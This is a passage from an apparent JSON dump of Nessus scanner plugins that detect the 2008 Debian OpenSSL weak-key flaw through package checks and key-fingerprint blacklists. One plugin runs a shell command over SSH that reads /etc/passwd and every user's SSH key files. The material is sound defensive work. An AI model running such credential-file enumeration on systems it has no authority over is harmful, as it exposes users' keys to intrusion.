script_xref(name:\"USN\", value:\"612-7\");\n\n script_name(english:\"Ubuntu 6.06 LTS : openssh update (USN-612-7)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-612-2 introduced protections for OpenSSH, related to the OpenSSL\nvulnerabilities addressed by USN-612-1. This update provides the\ncorresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the\nOpenSSL in Ubuntu 6.06 is not vulnerable, this update will block weak\nkeys generated on systems that may have been affected themselves.\n\nA weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-7/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssh-client\", pkgver:\"4.2p1-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssh-server\", pkgver:\"1:4.2p1-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ssh\", pkgver:\"4.2p1-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ssh-askpass-gnome\", pkgver:\"4.2p1-7ubuntu3.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-client / openssh-server / ssh / ssh-askpass-gnome\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-28T21:21:13", "bulletinFamily": "scanner", "description": "The remote host has one or more ~/.ssh/authorized_keys files\ncontaining weak SSH public keys generated on a Debian or Ubuntu\nsystem.\n\nThe problem is due to a Debian packager removing nearly all sources of\nentropy in the remote version of OpenSSL.\n\nThis problem does not only affect Debian since any user uploading a\nweak SSH key into the ~/.ssh/authorized_keys file will compromise the\nsecurity of the remote system.\n\nAn attacker could try a brute-force attack against the remote host and\nlogon using these weak keys.", "modified": "2008-05-15T00:00:00", "id": "SSH_DEBIAN_FIND_WEAK_KEYS.NASL", "href": "https://www.tenable.com/plugins/nessus/32320", "published": "2008-05-15T00:00:00", "title": "Weak Debian OpenSSH Keys in ~/.ssh/authorized_keys", "type": "nessus", "sourceData": "#TRUSTED 369ffc08483792c19103655c7d413395374c94cc142f015c96c824f402008642a1ca717e72d3ad2896aa4403b718b98994003213aefa06476b4301f2c507dd11eca8e2ffea231e685001ecf05ae573ce13d6eca64c1304342c7cbf150b418fc4199b138471b84a787b8e03a275223d8880a28d30d8f73b284476be0e166e151b112f2869798dcce7f996f3d55f7ebee2f93a4ce1acd75eef4acc9d7433aa0f3fcd532a1722e6eeab61a0095edbdac7d5f97299ac16bbc6654b419b4b1943ec98585a19be8a6f5abad084aa8997db96eb4ed6942d35d368495b196cc63f016c4ded677114884a6ce7d56aeb210f1e00d42913ff227dea0872d4793668c197161f557a8badbbb24baf1a70ba37acb0c013fe00b5f109173767459e6a5487b9cc2eb3768ab94391958c222eb1746ea17184fbcd4efe26f5ac7372721acf54072adff79316ad68c9470b8f4866d8fbc45e3cacbafa2dee0cdabaa8111768aac0d224f8e467841625606a999c4e9db6513365728409b3efc5204342164cc0e0a2a1f219d014ebebf04cfe458a69090162757a2a0afbb201ba756dd6ac8b7cb6d1500f5933492d485d17e4b107fc73294443eb71ecd71e94375a601985d491d11c8ebf71142fda34ae8aa6b2ad27bd7503b8dfea61f928f77d4a83f5325637456e139017f9a173ddaea1712c6b860ddf378d514ddfd009367e8f8060ced20e3c074faf\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32320);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/26\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"CERT\", value:\"925211\");\n script_xref(name:\"EDB-ID\", value:\"5720\");\n\n script_name(english:\"Weak Debian OpenSSH Keys in ~/.ssh/authorized_keys\");\n script_summary(english:\"Checks for the remote SSH public keys.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SSH host is set up to accept authentication with weak\nDebian SSH keys.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has one or more ~/.ssh/authorized_keys files\ncontaining weak SSH public keys generated on a Debian or Ubuntu\nsystem.\n\nThe problem is due to a Debian packager removing nearly all sources of\nentropy in the remote version of OpenSSL.\n\nThis problem does not only affect Debian since any user uploading a\nweak SSH key into the ~/.ssh/authorized_keys file will compromise the\nsecurity of the remote system.\n\nAn attacker could try a brute-force attack against the remote host and\nlogon using these weak keys.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Remove all the offending entries from ~/.ssh/authorized_keys.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-0166\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_dependencies(\"ssh_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/uname\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"audit.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nuname = get_kb_item(\"Host/uname\");\nif (empty_or_null(uname))\n audit(AUDIT_KB_MISSING, \"Host/uname\");\nelse if (\"Linux\" >!< uname)\n audit(AUDIT_OS_NOT, \"Linux\");\n\nSSH_RSA = 0;\nSSH_DSS = 1;\n\nfunction file_read_dword(fd)\n{\n local_var dword;\n\n dword = file_read(fp:fd, length:4);\n dword = getdword(blob:dword, pos:0);\n\n return dword;\n}\n\nfunction find_hash_list(type, first, second)\n{\n local_var list, fd, i, j, main_index, sec_index, c, offset, length, len, pos, file, tmp_list;\n\n if (type == SSH_RSA)\n file = \"blacklist_rsa.inc\";\n else if (type == SSH_DSS)\n file = \"blacklist_dss.inc\";\n\n if ( ! file_stat(file) ) return NULL;\n\n fd = file_open(name:file, mode:\"r\");\n if (!fd) return NULL;\n\n main_index = file_read_dword(fd:fd);\n\n for (i=0; i<main_index; i++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == first)\n {\n file_seek(fp:fd, offset:offset);\n sec_index = file_read_dword(fd:fd);\n\n for (j=0; j<sec_index; j++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == second)\n {\n file_seek(fp:fd, offset:offset);\n tmp_list = file_read(fp:fd, length:length);\n\n len = strlen(tmp_list);\n pos = 0;\n\n for (j=0; j<len; j+=10)\n list[pos++] = substr(tmp_list, j, j+9);\n break;\n }\n }\n break;\n }\n }\n\n file_close(fd);\n\n return list;\n}\n\nfunction is_vulnerable_fingerprint(type, fp)\n{\n local_var list, i, len;\n\n list = find_hash_list(type:type, first:fp[0], second:fp[1]);\n if (isnull(list))\n return FALSE;\n\n len = max_index(list);\n\n for (i=0; i<len; i++)\n if (list[i] == fp)\n return TRUE;\n\n return FALSE;\n}\n\nfunction wrapline()\n{\n local_var ret;\n local_var i, l, j;\n local_var str;\n str = _FCT_ANON_ARGS[0];\n l = strlen(str);\n for ( i = 0 ; i < l; i += 72 )\n {\n for ( j = 0 ; j < 72 ; j ++ )\n {\n ret += str[i+j];\n if ( i + j + 1 >= l ) break;\n }\n ret += '\\n';\n }\n return ret;\n}\n\nfunction get_key()\n{\n local_var pub, public, pubtab, num, i, line,blobpub,fingerprint,ret ;\n local_var file_array, keyfile, filename, home, text;\n local_var pub_array;\n local_var report;\n local_var home_report;\n local_var flag;\n local_var path;\n local_var file;\n\n text = _FCT_ANON_ARGS[0];\n if ( ! text ) return NULL;\n home_report = NULL;\n home = split(text, keep:FALSE);\n home = home[0];\n if(home[strlen(home)-1] == \"/\") home += \".ssh/\";\n else home += \"/.ssh/\";\n file_array = split(text, sep:\"## \", keep:FALSE);\n foreach keyfile (file_array)\n {\n line = 0;\n flag = 0;\n pub_array = split(keyfile, keep:FALSE);\n filename = pub_array[0];\n report = '\\n'+\"In file \" + home + filename + ':\\n';\n foreach pub ( pub_array )\n {\n if (\"# NOT FOUND\" >< pub || \"id_dsa.pub\" >< pub || \"id_rsa.pub\" >< pub || \"authorized_keys\" >< pub || \"### FINISHED\" >< pub)\n continue;\n\n line ++;\n if ( pub !~ \"ssh-[rd]s[sa]\" ) continue;\n public = ereg_replace(pattern:\".*ssh-[rd]s[sa] ([A-Za-z0-9+/=]+) .*$\", string:pub, replace:\"\\1\");\n if ( public == pub ) continue;\n\n blobpub = base64decode(str:public);\n fingerprint = substr(MD5(blobpub), 6, 15);\n if (\"ssh-rsa\" >< blobpub)\n {\n ret = is_vulnerable_fingerprint(type:SSH_RSA, fp:fingerprint);\n if (ret)\n {\n report += \"line \" + line + ':\\n' + wrapline(pub);\n flag ++;\n }\n }\n else\n {\n ret = is_vulnerable_fingerprint(type:SSH_DSS, fp:fingerprint);\n if (ret)\n {\n report += \"line \" + line + ':\\n' + wrapline(pub);\n flag ++;\n }\n }\n }\n if( flag > 0 ) home_report += report;\n }\n\n if ( empty_or_null(home_report) ) return NULL;\n return home_report;\n}\n\n# Decide transport for testing\nif (islocalhost())\n{\n if ( ! defined_func(\"pread\") ) exit(1, \"'pread()' is not defined.\");\n info_t = INFO_LOCAL;\n}\nelse\n{\n sock_g = ssh_open_connection();\n if (!sock_g) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n info_t = INFO_SSH;\n}\n\ncmd = info_send_cmd(cmd:'cat /etc/passwd | cut -d: -f6 | grep -v \"[;&|'+\"\\\"+'`$]\" | while read h; do [ -d \"$h/.ssh\" ] && echo \"### HOME: $h\" && (for f in id_rsa.pub id_dsa.pub authorized_keys; do echo \"## $f\"; cat \"$h/.ssh/$f\" 2>/dev/null || echo \"# NOT FOUND\"; done); done; echo \"### FINISHED\"');\nif ( ! cmd || \"## id_rsa.pub\" >!< cmd)\n{\n if (info_t == INFO_SSH) ssh_close_connection();\n exit(0, \"Failed to get the contents of the /etc/passwd file.\");\n}\nhomes = make_list();\n\nforeach home ( split(cmd, sep:\"### HOME: \", keep:FALSE) )\n{\n homefold = split(home, keep:FALSE);\n homefold = homefold[0];\n if(empty_or_null(homefold) || homes[homefold]) continue;\n else homes[homefold] = home;\n}\n\nforeach home ( homes )\n{\n report += get_key(home);\n}\n\nif (info_t == INFO_SSH) ssh_close_connection();\n\nif (report)\n{\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n}\nelse\n audit(AUDIT_HOST_NOT,\"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-10-28T21:21:13", "bulletinFamily": "scanner", "description": "The remote x509 certificate on the remote SSL server has been generated\non a Debian or Ubuntu system which contains a bug in the random number\ngenerator of its OpenSSL library. \n\nThe problem is due to a Debian packager removing nearly all sources of\nentropy in the remote version of OpenSSL. \n\nAn attacker can easily obtain the private part of the remote key and use\nthis to decipher the remote session or set up a man in the middle\nattack.", "modified": "2008-05-15T00:00:00", "id": "SSL_DEBIAN_WEAK.NASL", "href": "https://www.tenable.com/plugins/nessus/32321", "published": "2008-05-15T00:00:00", "title": "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)", "type": "nessus", "sourceData": "#TRUSTED 992ae86b70bbb533bb65a06ee886e0dcfcf66ffb825de2fd77f5defb1bc063d4c30cd8a9b2643a3299f6281bb1ac481db27198f25f7f8c9581ea758b9a99c6f421e1a36fd8601a5799dfd78e142b2f0b243237cae90b8eb4d72bf47dd022e605fbffce0f21078916cca50c7cd72d2ddd6846925c26a883e6b1630a9c2d029141243ea85f82facedd545748a09cc4026f771646ffcd8701b1f070a5580abd07c6093220ca4f25443f5889dfdaf07f3debdcc9d334532222279a8b54c93d12d138d594f56778a68a04bed2c03eb9669eb6ac1750607d93a31768a85d2285bf3cbac2993386621b932012a83e8ff50edb74e6fdd99554833c96390eb99d8326e92ac3fb844c4a3c7f02d94f385c6da42807d0c57debdee2e2bb0347a4369e15083775bb1d43dc1073ce3578dc52b43aefa7011f3526262df3d50ebb78826e1ad33a504a5eac3e5880cbebfef4ea25e0c282f541d765cf216e9b328e3c63f0d1a29f7de44427e2cdfd7eb8afd47d66b4c3545c5e881cd5a3251411408fda6127947c22fcd44920731e550e59d47ac04a7b91f7889163e7bea983d12e06d5d8911d58651f24182b8d7ab52925886a2576f8a8380a17ecdc554a678684815b50d838059364a7cf8220c42e86d572d9432f353787161d9d88ba3b30f8798c161900ed16589e7d637e4fdb3d77cbf6c6f1cae933061428240bc1183f78df8b0b3c2cfecd\n#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( NASL_LEVEL < 3000 ) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32321);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n\n script_name(english:\"Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)\");\n script_summary(english:\"Checks for the remote SSL public key fingerprint\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote SSL certificate uses a weak key.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote x509 certificate on the remote SSL server has been generated\non a Debian or Ubuntu system which contains a bug in the random number\ngenerator of its OpenSSL library. \n\nThe problem is due to a Debian packager removing nearly all sources of\nentropy in the remote version of OpenSSL. \n\nAn attacker can easily obtain the private part of the remote key and use\nthis to decipher the remote session or set up a man in the middle\nattack.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?107f9bdc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f14f4224\");\n script_set_attribute(attribute:\"solution\", value:\n\"Consider all cryptographic material generated on the remote host to be\nguessable. In particuliar, all SSH, SSL and OpenVPN key material should\nbe re-generated.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_keys(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"x509_func.inc\");\n\nRSA_1024 = 0;\nRSA_2048 = 1;\n\nfunction file_read_dword(fd)\n{\n local_var dword;\n\n dword = file_read(fp:fd, length:4);\n dword = getdword(blob:dword, pos:0);\n\n return dword;\n}\n\n\nfunction find_hash_list(type, first, second)\n{\n local_var list, fd, i, j, main_index, sec_index, c, offset, length, len, pos, file, tmp_list;\n\n if (type == RSA_1024)\n file = \"blacklist_ssl_rsa1024.inc\";\n else if (type == RSA_2048)\n file = \"blacklist_ssl_rsa2048.inc\";\n\n if ( ! file_stat(file) ) return NULL;\n\n fd = file_open(name:file, mode:\"r\");\n if (!fd) return NULL;\n\n main_index = file_read_dword(fd:fd);\n\n for (i=0; i<main_index; i++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == first)\n {\n file_seek(fp:fd, offset:offset);\n sec_index = file_read_dword(fd:fd);\n\n for (j=0; j<sec_index; j++)\n {\n c = file_read(fp:fd, length:1);\n offset = file_read_dword(fd:fd);\n length = file_read_dword(fd:fd);\n\n if (c == second)\n {\n file_seek(fp:fd, offset:offset);\n tmp_list = file_read(fp:fd, length:length);\n\n len = strlen(tmp_list);\n pos = 0;\n\n for (j=0; j<len; j+=10)\n list[pos++] = substr(tmp_list, j, j+9);\n\n break;\n }\n }\n\n break;\n }\n }\n\n file_close(fd);\n\n return list;\n}\n\nfunction is_vulnerable_fingerprint(type, fp)\n{\n local_var list, i, len;\n\n list = find_hash_list(type:type, first:fp[0], second:fp[1]);\n if (isnull(list))\n return FALSE;\n\n len = max_index(list);\n\n for (i=0; i<len; i++)\n if (list[i] == fp)\n return TRUE;\n\n return FALSE;\n}\n\nget_kb_item_or_exit(\"SSL/Supported\");\n\nport = get_ssl_ports(fork:TRUE);\nif (isnull(port)) exit(1, \"The host does not appear to have any SSL-based services.\");\n\nif (!get_port_state(port)) exit(0, \"Port \" + port + \" is not open.\");\n\ncert = get_server_cert(port:port, encoding:\"der\");\nif (isnull(cert)) exit(1, \"Failed to read the certificate for the service listening on port \"+port+\".\");\n\nkey = parse_der_cert(cert:cert);\nif (isnull(key)) exit(1, \"Failed to parse the certificate from the service listening on port \"+port+\".\");\n\nkey = key['tbsCertificate'];\nkey = key['subjectPublicKeyInfo'];\nkey = key[1];\nkey = key[0];\n\nif(isnull(key)) exit(1, \"Failed to extract public key in the certificate from the service listening on port \"+port+\".\");\n\nbits = der_bit_length(key);\nif (bits == 2048)\n type = RSA_2048;\nelse if(bits == 1024)\n type = RSA_1024;\nelse exit(1, \"Unsupported public key length in the certificate from the service listening on port \"+port+\".\");\n\nwhile (strlen(key) > 0 && ord(key[0]) == 0)\n key = substr(key, 1, strlen(key)-1);\n\nif (strlen(key) == 0) exit(1, \"Failed to parse the key from the certificate from the service listening on port \"+port+\".\");\n\nmod = \"Modulus=\" + toupper(hexstr(key)) + '\\n';\n\nhex = substr(SHA1(mod), 0, 9);\n\nret = is_vulnerable_fingerprint(type:type, fp:hex);\nif (ret) security_hole(port);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-2.NASL", "href": "https://www.tenable.com/plugins/nessus/65109", "published": "2013-03-09T00:00:00", "title": "Ubuntu 7.04 / 7.10 / 8.04 LTS : openssh vulnerability (USN-612-2)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65109);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"USN\", value:\"612-2\");\n\n script_name(english:\"Ubuntu 7.04 / 7.10 / 8.04 LTS : openssh vulnerability (USN-612-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH.\n\nThis vulnerability only affects operating systems which (like Ubuntu)\nare based on Debian. However, other systems can be indirectly affected\nif weak keys are imported into them.\n\nWe consider this an extremely serious vulnerability, and urge all\nusers to act immediately to secure their systems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh-client and / or openssh-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssh-client\", pkgver:\"1:4.3p2-8ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"openssh-server\", pkgver:\"1:4.3p2-8ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openssh-client\", pkgver:\"1:4.6p1-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"openssh-server\", pkgver:\"1:4.6p1-5ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssh-client\", pkgver:\"1:4.7p1-8ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"openssh-server\", pkgver:\"1:4.7p1-8ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 